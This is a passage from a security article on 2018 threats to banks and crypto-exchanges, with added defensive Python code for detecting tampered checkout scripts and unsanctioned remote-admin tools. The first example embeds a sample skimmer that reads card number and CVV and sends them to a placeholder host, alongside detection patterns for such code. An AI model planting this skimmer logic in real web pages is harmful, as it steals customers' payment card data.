The past year has been extremely eventful in terms of the digital threats faced by financial institutions: cybercrime groups have used new infiltration techniques, and the geography of attacks has become more extensive.
According to Kaspersky Lab's KSN statistics, the Middle East, Turkey and Africa (META) region saw a 17% increase in banking malware attacks in 2018, reaching almost half a million attacks.
Cryptocurrencies have also become an established part of many people’s lives, and a more attractive target for cybercriminals across the world, which resulted in a rapid increase in malicious mining of cryptocurrencies.
Some of the key events of 2018 involving cyber threats to financial institutions include:
Arrest of well-known cybercrime group members
In 2018, police arrested a number of well-known cybercrime group members, including people behind Carbanak/Cobalt and FIN7. These groups have been involved in attacks on dozens, if not hundreds, of companies and financial institutions around the world. Unfortunately, the arrests, including that of the leader of Carbanak, did not bring their activities to a complete halt; instead, they seem to have started a process of splitting the groups into smaller cells.
The most active actor of 2018 was Lazarus. This group is gradually expanding its arsenal of tools and looking for new targets. The area of interest today includes banks, fin-tech companies, crypto-exchanges, PoS terminals, ATMs, and in terms of geography, we have recorded infection attempts in dozens of countries, most of which are located in Asia, Africa and Latin America.
Young fin-tech companies and crypto-exchanges are at a higher risk
At the end of last year, Kaspersky Lab noted that young fin-tech companies and crypto-exchanges are at higher risk because of the immaturity of their security systems. Companies of this type were targeted most often.
The most creative attack seen in 2018, from our point of view, was AppleJeus, which targeted cryptocurrency traders. In this case, the criminals created purpose-built trading software that looked legitimate and carried out legitimate functions. However, the program also fetched a malicious update that turned out to be a backdoor. This is a new type of attack, which infects its targets via the supply chain.
Continuing the topic of supply chain attacks, it is worth mentioning the MageCart group, which, by injecting skimming code into website payment pages (including those of large companies such as British Airways), was able to harvest a huge amount of payment card data in 2018. The attack was all the more effective because the criminals chose an interesting target: Magento, one of the most popular platforms for online stores. Using vulnerabilities in Magento, the criminals were able to infect dozens of sites, a technique that is likely to be adopted by several other groups.
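A practical check against this class of attack is to record a hash of every script the checkout page serves at deploy time and compare it with what the server actually serves later, which is the same calculation behind Subresource Integrity. The following Python example is added here to illustrate that check; it is not code from the original article or from Kaspersky Lab. The checkout script, the skimmed copy of it and the collector hostname are constructed samples, and the keyword heuristic is an assumed triage rule, not a signature from the MageCart investigations.

```python
import base64
import hashlib
import re

# Constructed sample: the site's own checkout script as deployed (baseline).
CLEAN_CHECKOUT_JS = b"""
document.getElementById('pay').addEventListener('submit', function (e) {
  // normal client-side validation only
  if (!document.getElementById('cardnumber').value) { e.preventDefault(); }
});
"""

# Constructed sample: the same file after a Magecart-style modification.
# The appended code reads the card fields on submit and sends them to a
# third-party host (placeholder name, not a real domain).
SKIMMED_CHECKOUT_JS = CLEAN_CHECKOUT_JS + b"""
document.getElementById('pay').addEventListener('submit', function () {
  var d = {n: document.getElementById('cardnumber').value,
           c: document.getElementById('cvv').value};
  new Image().src = 'https://stats-collector.example/i.gif?d=' + btoa(JSON.stringify(d));
});
"""


def sri_hash(content: bytes, algo: str = "sha384") -> str:
    """Return the hash in the format used by Subresource Integrity
    (integrity="sha384-<base64 digest>"), so the same value can be
    placed in the <script> tag that loads the file."""
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode()}"


def build_baseline(scripts: dict) -> dict:
    """Hash every script at deploy time. Keep the result outside the web
    root: an attacker who can edit the scripts could otherwise edit this too."""
    return {name: sri_hash(body) for name, body in scripts.items()}


def find_tampered(baseline: dict, current: dict) -> list:
    """Compare what the server serves now with the deploy-time baseline.
    Reports modified scripts and scripts that did not exist at deploy time
    (an added skimmer file), which is what an injection looks like."""
    changed = [name for name, body in current.items()
               if baseline.get(name) != sri_hash(body)]
    return sorted(changed)


# Assumed triage heuristic: card-field access together with an outbound
# request primitive in the same file.
_CARD_FIELD = re.compile(r"(card ?number|cvv|cvc|expir)", re.I)
_EXFIL = re.compile(r"(new Image\(\)\.src|fetch\(|XMLHttpRequest|sendBeacon)")


def looks_like_skimmer(js: bytes) -> bool:
    """Cheap signal for prioritising a script that was reported as changed."""
    text = js.decode("utf-8", errors="replace")
    return bool(_CARD_FIELD.search(text) and _EXFIL.search(text))


if __name__ == "__main__":
    baseline = build_baseline({"checkout.js": CLEAN_CHECKOUT_JS})
    served = {"checkout.js": SKIMMED_CHECKOUT_JS, "skim.js": SKIMMED_CHECKOUT_JS}
    for name in find_tampered(baseline, served):
        print(name, "CHANGED", "skimmer-like" if looks_like_skimmer(served[name]) else "")
```

The hash comparison catches any change to a first-party script, including the insertion of a single `<script src>` line into an existing file; the heuristic only helps decide what to look at first, since a clean validation script also references card fields.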
ATM malware families
Kaspersky Lab also noted the development of ATM malware families. In 2018, Kaspersky Lab specialists discovered six new families, bringing the total to more than 20. Some existing ATM malware families have also evolved: for example, the Ploutus malware from Latin America has been updated to a new version, Peralda, and has gained new functionality as a result. The greatest damage associated with attacks on ATMs was caused by infections spreading from internal banking networks, such as FASTCash and ATMJackPot, which allowed attackers to reach thousands of ATMs.
Attacks on organizations that use banking systems
2018 also saw attacks on organizations that use banking systems. Firstly, Kaspersky Lab's machine-learning-based behavioral analysis system detected several waves of malicious activity in 2018 related to the spread of the Buhtrap banking Trojan, as attackers embedded their code in popular news sites and forums.
Secondly, Kaspersky Lab detected attacks on the financial departments of industrial companies, where payments of hundreds of thousands of dollars would not cause much suspicion. In the final stages of attacks like this, the attackers often install remote administration tools such as RMS, TeamViewer and VNC on the infected computers.
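Because the final stage relies on legitimate remote administration tools rather than custom malware, a useful detection is to compare process creation events on finance workstations against the tools' known binary names and look at where they run from and what launched them. The Python example below is added here to show that logic; it is not code from the original article or from Kaspersky Lab. The process events are constructed sample lines in a simple CSV form (timestamp, host, user, image path, parent image path), the host names and users are invented, the list of "sanctioned" hosts is an assumption, and the set of binary names is the editor's mapping of the tools named in the text to their usual executable names.

```python
import re

# Executable names of the remote administration tools named in the text
# (editor's mapping; rutserv.exe / rfusclient.exe are the RMS service and client).
REMOTE_ADMIN_TOOLS = {
    "rutserv.exe": "RMS",
    "rfusclient.exe": "RMS",
    "teamviewer.exe": "TeamViewer",
    "tv_w32.exe": "TeamViewer",
    "tv_x64.exe": "TeamViewer",
    "winvnc.exe": "VNC",
    "tvnserver.exe": "VNC",
    "vncserver.exe": "VNC",
}

# Assumption: only IT administration hosts are expected to run these tools.
SANCTIONED_HOSTS = {"IT-ADMIN-01"}

# Locations an installer dropped by a phishing document typically writes to.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData|Downloads|Public)\\", re.I)

# Parents that indicate a document- or script-driven install rather than an admin.
SUSPICIOUS_PARENTS = {
    "winword.exe", "excel.exe", "outlook.exe", "wscript.exe",
    "cscript.exe", "powershell.exe", "cmd.exe", "mshta.exe",
}

# Constructed sample events: timestamp,host,user,image,parent
LOG_LINES = r"""
2018-11-05T09:12:31Z,FIN-PC-07,corp\ivanov,C:\Program Files\TeamViewer\TeamViewer.exe,C:\Windows\explorer.exe
2018-11-05T09:40:02Z,FIN-PC-12,corp\petrova,C:\Users\petrova\AppData\Local\Temp\rutserv.exe,C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
2018-11-05T10:03:45Z,FIN-PC-12,corp\petrova,C:\Windows\System32\svchost.exe,C:\Windows\System32\services.exe
2018-11-05T11:15:20Z,IT-ADMIN-01,corp\admin1,C:\Program Files\TightVNC\tvnserver.exe,C:\Windows\System32\services.exe
2018-11-05T13:22:08Z,FIN-PC-03,corp\sidorov,C:\ProgramData\winvnc.exe,C:\Windows\System32\wscript.exe
"""


def parse_events(lines: str) -> list:
    """Turn the CSV sample into dicts; paths here contain no commas."""
    events = []
    for line in lines.strip().splitlines():
        ts, host, user, image, parent = line.split(",")
        events.append({"ts": ts, "host": host, "user": user,
                       "image": image, "parent": parent})
    return events


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect_remote_admin_tools(events: list, sanctioned=SANCTIONED_HOSTS) -> list:
    """Flag remote admin tool launches that are unexpected for the host,
    run from a user-writable location, or were started by an Office
    application or script host. Each finding lists every reason that fired."""
    findings = []
    for ev in events:
        tool = REMOTE_ADMIN_TOOLS.get(basename(ev["image"]))
        if tool is None:
            continue
        reasons = []
        if ev["host"] not in sanctioned:
            reasons.append("host not sanctioned for remote admin tools")
        if USER_WRITABLE.search(ev["image"]):
            reasons.append("binary in user-writable path")
        parent = basename(ev["parent"])
        if parent in SUSPICIOUS_PARENTS:
            reasons.append(f"spawned by {parent}")
        if reasons:
            findings.append({"ts": ev["ts"], "host": ev["host"], "tool": tool,
                             "image": ev["image"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in detect_remote_admin_tools(parse_events(LOG_LINES)):
        print(f["ts"], f["host"], f["tool"], f["image"], "; ".join(f["reasons"]))
```

Run on the sample, the rule stays silent for the sanctioned VNC server on the IT host, raises a single-reason finding for TeamViewer on a finance PC, and raises three reasons each for the RMS service started by Word from the user's Temp directory and the VNC server launched by a script host from ProgramData; the number of reasons is a reasonable first cut at severity.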